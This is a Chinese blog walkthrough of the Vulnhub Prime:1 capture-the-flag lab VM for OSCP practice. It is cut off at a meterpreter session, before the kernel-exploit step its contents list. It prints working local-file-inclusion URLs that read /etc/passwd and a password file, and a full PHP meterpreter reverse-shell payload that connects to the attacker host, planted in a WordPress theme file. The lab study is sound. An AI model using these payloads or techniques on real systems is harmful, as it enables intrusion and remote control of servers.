当前位置：首页 > news >正文

公司网站建设的意义麻江网站建设

news 2025/12/29 1:55:26

公司网站建设的意义,麻江网站建设,网站建设业务培训资料,企业网站备案网站名称免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。目录免责声明前言一、环境配置1.1 靶场信息1.2 靶场配置二、信息收集2.1 主机发现2.1.1 netdiscover2.1.2 nmap主机扫描2.1.3 arp-scan主机扫描 2.2 端口扫描…免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。目录免责声明前言一、环境配置1.1 靶场信息1.2 靶场配置二、信息收集2.1 主机发现2.1.1 netdiscover2.1.2 nmap主机扫描2.1.3 arp-scan主机扫描 2.2 端口扫描2.2.1 masscan扫描2.2.2 nmap扫描 2.3 指纹识别2.4 目录扫描2.4.1 dirb目录扫描2.4.2 dirsearch目录扫描 2.5 漏洞切入点2.5.1 访问登录页2.5.2 访问dev页2.5.3 访问wordpress页2.5.4 poc扫描三、渗透测试3.1 wfuzz和LFI3.1.1 wfuzz爆破参数3.1.2 LFI3.1.2.1 file参数3.1.2.2 secrettier360参数3.1.2.2.1 secrettier3603.1.2.2.2 secrettier360FUZZ3.1.2.2.3 secrettier360dev3.1.2.2.4 secrettier360/etc/passwd3.1.2.2.5 secrettier360/home/saket/password.txt 3.2 WordPress漏洞3.2.1 列举用户名3.2.1.1 cmseek扫描3.2.1.2 wpscan扫描 3.2.2 登录管理页3.2.3 msfconsole3.2.3.1 msfvenom生成反弹shell3.2.3.2 msf监听4567端口3.2.3.3 访问测试 3.3 Linux内核漏洞提权3.3.1 漏洞查找3.3.2 复制poc3.3.3 编译poc文件3.3.4 上传编译poc3.3.5 执行编译poc3.3.5.1 目录切换3.3.5.2 赋予可执行权限3.3.5.3 执行编译文件渗透总结参考文章前言今日测试内容渗透prime:1靶机 Vulnhub是一个提供各种漏洞环境的靶场平台大部分环境是做好的虚拟机镜像文件镜像预先设计了多种漏洞。本文介绍prime:1靶机渗透测试内容包括主机扫描nmap\netdiscover、端口扫描nmap\masscan、目录扫描dirb\dirsearch、wpscan、msf、netcat、反弹shell、linux内核提权等内容。 Description Back to the Top This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam. This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox’s machines are designed. So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration. If any extra help needed Visit our website http://hacknpentest.com and http://hnpsecurity.com. Some extra improvement needed to my VM please contact me on my email- suraj at hnpsecurity dot com. 一、环境配置 1.1 靶场信息官方链接https://www.vulnhub.com/entry/prime-1,358/发布日期2019年9月1日靶场大小2.2GB作者Suraj Pandey系列Prime难度★★☆☆☆ 1.2 靶场配置渗透测试环境配置请参考作者前面的内容vuInhub靶场实战系列-DC-2实战二、信息收集 2.1 主机发现 2.1.1 netdiscover ┌──(root㉿kali)-[/home/kali] └─# netdiscover -i eth0 -r 192.168.6.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 169 Captured ARP Req/Rep packets, from 4 hosts. Total size: 10140 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.6.1 00:50:56:c0:00:08 148 8880 VMware, Inc. 192.168.6.2 00:50:56:f5:7b:9f 14 840 VMware, Inc. 192.168.6.162 00:0c:29:0a:67:ce 5 300 VMware, Inc. 192.168.6.254 00:50:56:ec:e5:84 2 120 VMware, Inc. 2.1.2 nmap主机扫描 ┌──(root㉿kali)-[/home/kali] └─# nmap -sP 192.168.6.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-05 07:45 EDT Nmap scan report for 192.168.6.1 Host is up (0.00025s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.6.2 Host is up (0.00020s latency). MAC Address: 00:50:56:F5:7B:9F (VMware) Nmap scan report for 192.168.6.162 Host is up (0.0011s latency). MAC Address: 00:0C:29:0A:67:CE (VMware) Nmap scan report for 192.168.6.254 Host is up (0.0016s latency). MAC Address: 00:50:56:EC:E5:84 (VMware) Nmap scan report for 192.168.6.66 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 28.20 seconds 2.1.3 arp-scan主机扫描 ┌──(root㉿kali)-[/home/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.6.1 00:50:56:c0:00:08 VMware, Inc. 192.168.6.2 00:50:56:f5:7b:9f VMware, Inc. 192.168.6.162 00:0c:29:0a:67:ce VMware, Inc. 192.168.6.254 00:50:56:ec:e5:84 VMware, Inc. 192.168.6.1 00:50:56:c0:00:08 VMware, Inc. (DUP: 2) 综上所述的三种扫描方式获得靶机信息 IP地址192.168.6.162 MAC地址00:0c:29:0a:67:ce 2.2 端口扫描 2.2.1 masscan扫描 ┌──(root㉿kali)-[/home/kali] └─# masscan --rate10000 --ports 0-65535 192.168.6.162 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-06-05 11:48:48 GMT Initiating SYN Stealth Scan Scanning 1 hosts [65536 ports/host] Discovered open port 22/tcp on 192.168.6.162 2.2.2 nmap扫描 ┌──(root㉿kali)-[/home/kali] └─# nmap -sC -sV -oA prime-1 192.168.6.162 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-05 07:51 EDT Nmap scan report for 192.168.6.162 Host is up (0.00079s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA) | 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA) |_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: HacknPentest |_http-server-header: Apache/2.4.18 (Ubuntu) MAC Address: 00:0C:29:0A:67:CE (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds 综上所述获得靶机开放的端口信息 22端口ssh服务 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80端口http服务 Apache httpd 2.4.18 ((Ubuntu)) 2.3 指纹识别 ┌──(root㉿kali)-[/home/kali] └─# whatweb -v 192.168.6.162 WhatWeb report for http://192.168.6.162 Status : 200 OK Title : HacknPentest IP : 192.168.6.162 Country : RESERVED, ZZSummary : Apache[2.4.18], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)]Detected Plugins: [ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.4.18 (from HTTP Server Header)Google Dorks: (3)Website : http://httpd.apache.org/[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Ubuntu LinuxString : Apache/2.4.18 (Ubuntu) (from server string)HTTP Headers:HTTP/1.1 200 OKDate: Wed, 05 Jun 2024 11:54:25 GMTServer: Apache/2.4.18 (Ubuntu)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 132Connection: closeContent-Type: text/html; charsetUTF-8 获得一些关键信息; Summary : Apache[2.4.18], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)] 获得信息和上一步进行端口扫描差不多。 2.4 目录扫描 2.4.1 dirb目录扫描 ┌──(root㉿kali)-[/home/kali] └─# dirb http://192.168.6.162----------------- DIRB v2.22 By The Dark Raver -----------------START_TIME: Wed Jun 5 07:56:25 2024 URL_BASE: http://192.168.6.162/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.6.162/ ----http://192.168.6.162/dev (CODE:200|SIZE:131) http://192.168.6.162/index.php (CODE:200|SIZE:136) DIRECTORY: http://192.168.6.162/javascript/ http://192.168.6.162/server-status (CODE:403|SIZE:278) DIRECTORY: http://192.168.6.162/wordpress/ ---- Entering directory: http://192.168.6.162/javascript/ ----DIRECTORY: http://192.168.6.162/javascript/jquery/ ---- Entering directory: http://192.168.6.162/wordpress/ ----http://192.168.6.162/wordpress/index.php (CODE:301|SIZE:0) DIRECTORY: http://192.168.6.162/wordpress/wp-admin/ DIRECTORY: http://192.168.6.162/wordpress/wp-content/ DIRECTORY: http://192.168.6.162/wordpress/wp-includes/ http://192.168.6.162/wordpress/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.6.162/javascript/jquery/ ----http://192.168.6.162/javascript/jquery/jquery (CODE:200|SIZE:284394) ---- Entering directory: http://192.168.6.162/wordpress/wp-admin/ ----http://192.168.6.162/wordpress/wp-admin/admin.php (CODE:302|SIZE:0) DIRECTORY: http://192.168.6.162/wordpress/wp-admin/css/ DIRECTORY: http://192.168.6.162/wordpress/wp-admin/images/ DIRECTORY: http://192.168.6.162/wordpress/wp-admin/includes/ http://192.168.6.162/wordpress/wp-admin/index.php (CODE:302|SIZE:0) DIRECTORY: http://192.168.6.162/wordpress/wp-admin/js/ DIRECTORY: http://192.168.6.162/wordpress/wp-admin/maint/ DIRECTORY: http://192.168.6.162/wordpress/wp-admin/network/ DIRECTORY: http://192.168.6.162/wordpress/wp-admin/user/ ---- Entering directory: http://192.168.6.162/wordpress/wp-content/ ----http://192.168.6.162/wordpress/wp-content/index.php (CODE:200|SIZE:0) DIRECTORY: http://192.168.6.162/wordpress/wp-content/plugins/ DIRECTORY: http://192.168.6.162/wordpress/wp-content/themes/ DIRECTORY: http://192.168.6.162/wordpress/wp-content/uploads/ ---- Entering directory: http://192.168.6.162/wordpress/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)---- Entering directory: http://192.168.6.162/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)---- Entering directory: http://192.168.6.162/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)---- Entering directory: http://192.168.6.162/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)---- Entering directory: http://192.168.6.162/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)---- Entering directory: http://192.168.6.162/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)---- Entering directory: http://192.168.6.162/wordpress/wp-admin/network/ ----http://192.168.6.162/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) http://192.168.6.162/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.6.162/wordpress/wp-admin/user/ ----http://192.168.6.162/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) http://192.168.6.162/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.6.162/wordpress/wp-content/plugins/ ----http://192.168.6.162/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.6.162/wordpress/wp-content/themes/ ----http://192.168.6.162/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.6.162/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode -w if you want to scan it anyway)----------------- END_TIME: Wed Jun 5 07:57:25 2024 DOWNLOADED: 46120 - FOUND: 15┌──(root㉿kali)-[/home/kali] └─# dirb http://192.168.6.162/ -X .txt,.php,.zip----------------- DIRB v2.22 By The Dark Raver -----------------START_TIME: Wed Jun 5 08:53:00 2024 URL_BASE: http://192.168.6.162/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.txt,.php,.zip) | (.txt)(.php)(.zip) [NUM 3]-----------------GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.6.162/ ----http://192.168.6.162/image.php (CODE:200|SIZE:147) http://192.168.6.162/index.php (CODE:200|SIZE:136) http://192.168.6.162/secret.txt (CODE:200|SIZE:412) ----------------- END_TIME: Wed Jun 5 08:53:14 2024 DOWNLOADED: 13836 - FOUND: 3 bash终端显示的日志前面有“”表示扫描出的网站目录。 2.4.2 dirsearch目录扫描 ┌──(root㉿kali)-[/home/kali] └─# dirsearch -u 192.168.6.162 -e * -x 404 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.6.162/_24-06-05_07-59-25.txtTarget: http://192.168.6.162/[07:59:25] Starting: [07:59:29] 403 - 278B - /.ht_wsr.txt [07:59:29] 403 - 278B - /.htaccess.bak1 [07:59:29] 403 - 278B - /.htaccess.orig [07:59:29] 403 - 278B - /.htaccess.save [07:59:29] 403 - 278B - /.htaccess_orig [07:59:29] 403 - 278B - /.htaccessBAK [07:59:29] 403 - 278B - /.htaccess_sc [07:59:29] 403 - 278B - /.htm [07:59:29] 403 - 278B - /.html [07:59:29] 403 - 278B - /.htaccess_extra [07:59:29] 403 - 278B - /.htaccessOLD [07:59:29] 403 - 278B - /.htaccessOLD2 [07:59:29] 403 - 278B - /.htpasswds [07:59:29] 403 - 278B - /.htaccess.sample [07:59:29] 403 - 278B - /.httr-oauth [07:59:29] 403 - 278B - /.htpasswd_test [07:59:31] 403 - 278B - /.php3 [07:59:31] 403 - 278B - /.php [08:00:03] 200 - 131B - /dev [08:00:17] 301 - 319B - /javascript - http://192.168.6.162/javascript/ [08:00:45] 403 - 278B - /server-status [08:00:45] 403 - 278B - /server-status/ [08:01:07] 200 - 1KB - /wordpress/wp-login.php [08:01:07] 200 - 4KB - /wordpress/ Task Completed 测试结果显示,获得一些目录登录管理页http://192.168.6.162/wordpress/wp-login.php http://192.168.6.162/wordpress/wp-content/uploads/ http://192.168.6.162/wordpress/ http://192.168.6.162/dev/ 2.5 漏洞切入点 2.5.1 访问登录页访问链接 http://192.168.6.162/wordpress/wp-login.php 2.5.2 访问dev页测试链接 http://192.168.6.162/dev 返回“you are at level 0 stage…” 2.5.3 访问wordpress页测试链接 http://192.168.6.162/wordpress/ 2.5.4 poc扫描 ┌──(root㉿kali)-[/home/kali] └─# nmap --scriptvuln -p22,80 192.168.6.162 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-05 08:17 EDT Nmap scan report for 192.168.6.162 Host is up (0.0017s latency).PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-stored-xss: Couldnt find any stored XSS vulnerabilities. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-dombased-xss: Couldnt find any DOM based XSS. |_http-csrf: Couldnt find any CSRF vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http servers resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?nameCVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-enum: | /wordpress/: Blog |_ /wordpress/wp-login.php: Wordpress login page. MAC Address: 00:0C:29:0A:67:CE (VMware)Nmap done: 1 IP address (1 host up) scanned in 334.61 seconds 发现一个编号为CVE-2007-6750的DOS攻击“ DOS attack”漏洞三、渗透测试 3.1 wfuzz和LFI 3.1.1 wfuzz爆破参数 ┌──(root㉿kali)-[/home/kali] └─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.6.162/index.php?FUZZ/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************Target: http://192.168.6.162/index.php?FUZZ Total requests: 951 ID Response Lines Word Chars Payload 000000341: 200 7 L 19 W 206 Ch file Total time: 1.809526 Processed Requests: 951 Filtered Requests: 950 Requests/sec.: 525.5519 获得一个file参数則该靶机存在文件包含漏洞。 3.1.2 LFI 3.1.2.1 file参数测试连接 http://192.168.6.162/index.php?filelocation.txt 提示“use ‘secrettier360’ parameter on some other php page for more fun.” 提示我们使用参数secrettier360 3.1.2.2 secrettier360参数 3.1.2.2.1 secrettier360 测试连接 http://192.168.6.162/image.php?secrettier360 提示“finaly you got the right parameter”。我们获得正确的参数。O(∩_∩)O哈哈~ 3.1.2.2.2 secrettier360FUZZ ┌──(root㉿kali)-[/home/kali] └─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 17 http://192.168.6.162/image.php?secrettier360FUZZ/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************Target: http://192.168.6.162/image.php?secrettier360FUZZ Total requests: 951 ID Response Lines Word Chars Payload 000000257: 200 13 L 43 W 328 Ch dev Total time: 2.187057 Processed Requests: 951 Filtered Requests: 950 Requests/sec.: 434.8308 这一步我们获得参数值“dev” 3.1.2.2.3 secrettier360dev 测试连接 http://192.168.6.162/image.php?secrettier360dev 3.1.2.2.4 secrettier360/etc/passwd 测试连接 http://192.168.6.162/image.php?secrettier360/etc/passwd 关键信息在最后一行 password.txt file in my directory:/home/saket: sshd❌122:65534::/var/run/sshd:/usr/sbin/nologin 3.1.2.2.5 secrettier360/home/saket/password.txt 测试连接 http://192.168.6.162/image.php?secrettier360/home/saket/password.txt 我们至此已经获得登录密码序号密码1follow_the_ippsec 3.2 WordPress漏洞网站登录页目标页面为http://192.168.6.162/wordpress/ 3.2.1 列举用户名 3.2.1.1 cmseek扫描 ┌──(root㉿kali)-[/home/kali] └─# cmseek -u http://192.168.6.162/wordpress/ [i] Updating CMSeeK result index... [*] Report index updated successfully!___ _ _ ____ ____ ____ _ _ | |\/| [__ |___ |___ |_/ by r3dhax0r |___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA[] CMS Detection And Deep Scan [] [i] Scanning Site: http://192.168.6.162/wordpress/ [*] CMS Detected, CMS ID: wp, Detection method: generator [*] Version Detected, WordPress Version 5.2.2 [i] Checking user registration status [i] Starting passive plugin enumeration [x] No plugins enumerated! [i] Starting passive theme enumeration [*] 1 theme detected! [i] Starting Username Harvest [i] Harvesting usernames from wp-json api [!] Json api method failed trying with next [i] Harvesting usernames from jetpack public api [!] No results from jetpack api... maybe the site doesnt use jetpack [i] Harvesting usernames from wordpress author Parameter [!] Couldnt enumerate usernames :( [i] Checking version vulnerabilities using wpvulns.com [x] Error Retriving data from wpvulndb___ _ _ ____ ____ ____ _ _ | |\/| [__ |___ |___ |_/ by r3dhax0r |___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA[] Deep Scan Results [] ┏━Target: 192.168.6.162┃┠── CMS: WordPress┃ │┃ ├── Version: 5.2.2┃ ╰── URL: https://wordpress.org┃┠──[WordPress Deepscan]┃ │┃ ├── Readme file found: http://192.168.6.162/wordpress//readme.html┃ ├── License file: http://192.168.6.162/wordpress//license.txt┃ │┃ ├── Themes Enumerated: 1┃ │ │┃ │ ╰── Theme: twentynineteen┃ │ │┃ │ ├── Version: 1.4┃ │ ╰── URL: http://192.168.6.162/wordpress//wp-content/themes/twentynineteen┃ │┃┠── Result: /usr/share/cmseek/Result/192.168.6.162_wordpress/cms.json┃┗━Scan Completed in 27.66 Seconds, using 45 RequestsCMSeeK says ~ Ja mata ne 获得一些关键信息 CMS: WordPress版本5.2.2 Theme: twentynineteen 版本1.4 http://192.168.6.162/wordpress//wp-content/themes/twentynineteen 3.2.1.2 wpscan扫描 ┌──(root㉿kali)-[/home/kali] └─# wpscan --url http://192.168.6.162/wordpress/ --enumerate u _________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®\ \/ \/ / | ___/ \___ \ / __|/ _ | _ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/_WPScan_, ethicalhack3r, erwan_lr, firefart _______________________________________________________________[i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]Y [i] Updating the Database ... [i] Update completed.[] URL: http://192.168.6.162/wordpress/ [192.168.6.162] [] Started: Wed Jun 5 09:44:44 2024Interesting Finding(s):[] Headers| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)| Found By: Headers (Passive Detection)| Confidence: 100%[] XML-RPC seems to be enabled: http://192.168.6.162/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:| - http://codex.wordpress.org/XML-RPC_Pingback_API| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[] WordPress readme found: http://192.168.6.162/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[] Upload directory has listing enabled: http://192.168.6.162/wordpress/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[] The external WP-Cron seems to be enabled: http://192.168.6.162/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:| - https://www.iplocation.net/defend-wordpress-from-ddos| - https://github.com/wpscanteam/wpscan/issues/1299[] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).| Found By: Rss Generator (Passive Detection)| - http://192.168.6.162/wordpress/?feedrss2, generatorhttps://wordpress.org/?v5.2.2/generator| - http://192.168.6.162/wordpress/?feedcomments-rss2, generatorhttps://wordpress.org/?v5.2.2/generator[] WordPress theme in use: twentynineteen| Location: http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/| Last Updated: 2024-04-02T00:00:00.000Z| Readme: http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/readme.txt| [!] The version is out of date, the latest version is 2.8| Style URL: http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/style.css?ver1.4| Style Name: Twenty Nineteen| Style URI: https://wordpress.org/themes/twentynineteen/| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...| Author: the WordPress team| Author URI: https://wordpress.org/|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.4 (80% confidence)| Found By: Style (Passive Detection)| - http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/style.css?ver1.4, Match: Version: 1.4[] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[] victor| Found By: Author Posts - Display Name (Passive Detection)| Confirmed By:| Rss Generator (Passive Detection)| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[] Finished: Wed Jun 5 09:44:53 2024 [] Requests Done: 62 [] Cached Requests: 6 [] Data Sent: 15.66 KB [] Data Received: 13.341 MB [] Memory used: 199.113 MB [] Elapsed time: 00:00:08 获得一个用户名 victor 综上所述我们已经获得一个用户和一个密码序号用户名密码1victorfollow_the_ippsec 3.2.2 登录管理页信息如下序号项目值1后台管理页http://192.168.6.162/wordpress/wp-login.php2用户名victor3用户名follow_the_ippsec 登录成功后台管理页举例最后的成功不远了。O(∩_∩)O哈哈~ 在这里找到一个secret.php 提示“/* ohh Finaly you got a writable file*/” 3.2.3 msfconsole 3.2.3.1 msfvenom生成反弹shell ┌──(root㉿kali)-[/home/kali/prime1] └─# msfvenom -p php/meterpreter/reverse_tcp lhost192.168.6.66 lport4567 -o shell.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 1113 bytes Saved as: shell.php┌──(root㉿kali)-[/home/kali/prime1] └─# ls shell.php┌──(root㉿kali)-[/home/kali/prime1] └─# cat shell.php /*?php /**/ error_reporting(0); $ip 192.168.6.66; $port 4567; if (($f stream_socket_client) is_callable($f)) { $s $f(tcp://{$ip}:{$port}); $s_type stream; } if (!$s ($f fsockopen) is_callable($f)) { $s $f($ip, $port); $s_type stream; } if (!$s ($f socket_create) is_callable($f)) { $s $f(AF_INET, SOCK_STREAM, SOL_TCP); $res socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type socket; } if (!$s_type) { die(no socket funcs); } if (!$s) { die(no socket); } switch ($s_type) { case stream: $len fread($s, 4); break; case socket: $len socket_read($s, 4); break; } if (!$len) { die(); } $a unpack(Nlen, $len); $len $a[len]; $b ; while (strlen($b) $len) { switch ($s_type) { case stream: $b . fread($s, $len-strlen($b)); break; case socket: $b . socket_read($s, $len-strlen($b)); break; } } $GLOBALS[msgsock] $s; $GLOBALS[msgsock_type] $s_type; if (extension_loaded(suhosin) ini_get(suhosin.executor.disable_eval)) { $suhosin_bypasscreate_function(, $b); $suhosin_bypass(); } else { eval($b); } die(); 已经生成shell.php,将shell.php中注释符号“/*”去除再将内容复制到上一步的secret.php中 ?php /**/ error_reporting(0); $ip 192.168.6.66; $port 4567; if (($f stream_socket_client) is_callable($f)) { $s $f(tcp://{$ip}:{$port}); $s_type stream; } if (!$s ($f fsockopen) is_callable($f)) { $s $f($ip, $port); $s_type stream; } if (!$s ($f socket_create) is_callable($f)) { $s $f(AF_INET, SOCK_STREAM, SOL_TCP); $res socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type socket; } if (!$s_type) { die(no socket funcs); } if (!$s) { die(no socket); } switch ($s_type) { case stream: $len fread($s, 4); break; case socket: $len socket_read($s, 4); break; } if (!$len) { die(); } $a unpack(Nlen, $len); $len $a[len]; $b ; while (strlen($b) $len) { switch ($s_type) { case stream: $b . fread($s, $len-strlen($b)); break; case socket: $b . socket_read($s, $len-strlen($b)); break; } } $GLOBALS[msgsock] $s; $GLOBALS[msgsock_type] $s_type; if (extension_loaded(suhosin) ini_get(suhosin.executor.disable_eval)) { $suhosin_bypasscreate_function(, $b); $suhosin_bypass(); } else { eval($b); } die();最后点击【Update File】提示“File edited successfully.” 3.2.3.2 msf监听4567端口 ──(root㉿kali)-[/home/kali/prime1] └─# msfconsole Metasploit tip: Use the resource command to run commands from a file______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V5 | |______________________________________________________________________________|\ / /\ . / / x\ / /\ / /\ / /* / // . /X / / X/ ###/ # % #/ ###. /. / . * ./* *^ #### __ __ __ ####### __ __ __ #### #### / \ / \ / \ ########### / \ / \ / \ #### ################################################################################ ################################################################################ # WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################https://metasploit.com[ metasploit v6.4.1-dev ]-- --[ 2407 exploits - 1239 auxiliary - 422 post ]-- --[ 1468 payloads - 47 encoders - 11 nops ]-- --[ 9 evasion ]Metasploit Documentation: https://docs.metasploit.com/msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload php/meterpreter/reverse_tcp payload php/meterpreter/reverse_tcp msf6 exploit(multi/handler) show optionsPayload options (php/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard TargetView the full module info with the info, or info -d command.msf6 exploit(multi/handler) set LHOST 192.168.6.66 LHOST 192.168.6.66 msf6 exploit(multi/handler) set LPORT 4567 LPORT 4567 msf6 exploit(multi/handler) exploit[*] Started reverse TCP handler on 192.168.6.66:4567 监听4567端口成功。 3.2.3.3 访问测试测试地址http://192.168.6.162/wordpress/wp-content/themes/twentynineteen/secret.php 更多测试代码 meterpreter getuid Server username: www-data meterpreter sysinfo Computer : ubuntu OS : Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 Meterpreter : php/linux meterpreter ls Listing: /var/www/html/wordpress/wp-content/themes/twentynineteen Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100644/rw-r--r-- 840 fil 2018-12-14 05:33:42 -0500 404.php 100644/rw-r--r-- 1229 fil 2018-12-19 06:18:26 -0500 archive.php 040755/rwxr-xr-x 4096 dir 2019-06-18 20:50:52 -0400 classes 100644/rw-r--r-- 3988 fil 2018-12-14 06:25:40 -0500 comments.php 040755/rwxr-xr-x 4096 dir 2019-06-18 20:50:52 -0400 fonts 